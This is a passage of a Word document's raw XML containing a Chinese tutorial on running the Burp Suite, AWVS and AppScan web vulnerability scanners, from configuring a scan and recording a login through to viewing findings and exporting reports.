                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="57912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当扫描结束后，我们查看 Target 模块下，扫描出的漏洞可以在这个界面下查看， 如图，命令注入漏洞、SQL 注入漏洞、XSS 漏洞等全部扫描出来了。</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8334375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="51" name="图片 5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 descr="IMG_262"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="83343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然后我们可以利用这些扫面出的漏洞去手工验证，也可以利用 Burp Suite 的 Intruder 和 Repeater 模块去攻击。</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Burp Suite 的测试报告可以以 html 的形式导出，选择某个站点右击--issues--report issues for this host 即可。当然，Burp Suite 功能非常强大，感兴趣的朋友可以去 系统的学习该工具。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扫描工具AWVS实例演示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Acunetix Web Vulnerability Scanner（简称AWVS）是一</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>款知名的Web网络漏洞扫描工具，它通过网络爬虫测试你的网站安全，检测流行安全漏洞。</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AWVS首页面：</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8248650" cy="5619750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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 descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8248650" cy="56197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下面简述下AWVS扫描步骤：</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第一步：</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新建扫描，点击左上角New Scan按钮，会弹出扫描配置窗口，在Website URL中输入要扫面的web地址：</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581775" cy="5219700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="59"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7" descr="IMG_257"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6581775" cy="52197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默认Next即可，直到Login配置下，点击New Login Sequence，手动输入用户名、密码即可，然后选择刚记录的Login sequence：</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6581775" cy="5219700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="57" name="图片 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descr="IMG_258"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6581775" cy="52197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Next至Finish即可。然后AWVS会自动进行扫描，扫描结束后，我们可以看到扫描出的漏洞详情：</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153650" cy="7267575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="56" name="图片 5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9" descr="IMG_259"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10153650" cy="72675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扫描结束后，可以选择Tools—Reporter来导出测试报告。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>扫描工具AppScan实例演示</w:t>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AppScan是IBM的一款强大的web安全漏洞扫描工具。</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5715000" cy="4333875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="6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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="4333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选择常规扫描，打开配置向导，默认下一步，在起始URL中输入要扫描的网址：</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5848350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61" name="图片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257"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="584835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下一步，登录管理，如果需要登录，选择记录即可打开页面手动输入用户密码登录，AppScan会自动记录用户信息，然后下一步至完成后自动扫描站点目录及文件信息。</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7000875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="63" name="图片 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descr="IMG_258"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="7000875"/>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然后点击扫描-继续完全扫描，扫描结束后，我们可以点击右上角问题，查看扫面出的漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="10287000" cy="6591300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="图片 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3" descr="IMG_259"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10287000" cy="6591300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="3E3E3E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>扫描结束后，点击报告可以导出测试报告。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>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6B0487"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C86B0487"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="5"/>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splitPgBreakAndParaMark/>
    <w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="12"/>
  </w:compat>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="258501AC"/>
    <w:rsid w:val="2DE22B63"/>
    <w:rsid w:val="39D95CDA"/>
    <w:rsid w:val="40955A55"/>
    <w:rsid w:val="54B70B66"/>
    <w:rsid w:val="58ED0FC7"/>
    <w:rsid w:val="5FAD7930"/>
    <w:rsid w:val="622F3564"/>
    <w:rsid w:val="65DC039B"/>
    <w:rsid w:val="69175BC9"/>
    <w:rsid w:val="6AB64B4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sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:beforeLines="0" w:beforeAutospacing="0" w:afterLines="0" w:afterAutospacing="0" w:line="120"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18</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <Application>WPS Office_11.1.0.11115_F1E327BC-269C-435d-A152-05C5408002CA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2021-12-01T06:12:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>弎零肆捌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-01T06:32:13Z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ICV">
    <vt:lpwstr>94545B991DBB495AB5F7380ED90AA53D</vt:lpwstr>
  </property>
</Properties>
</file>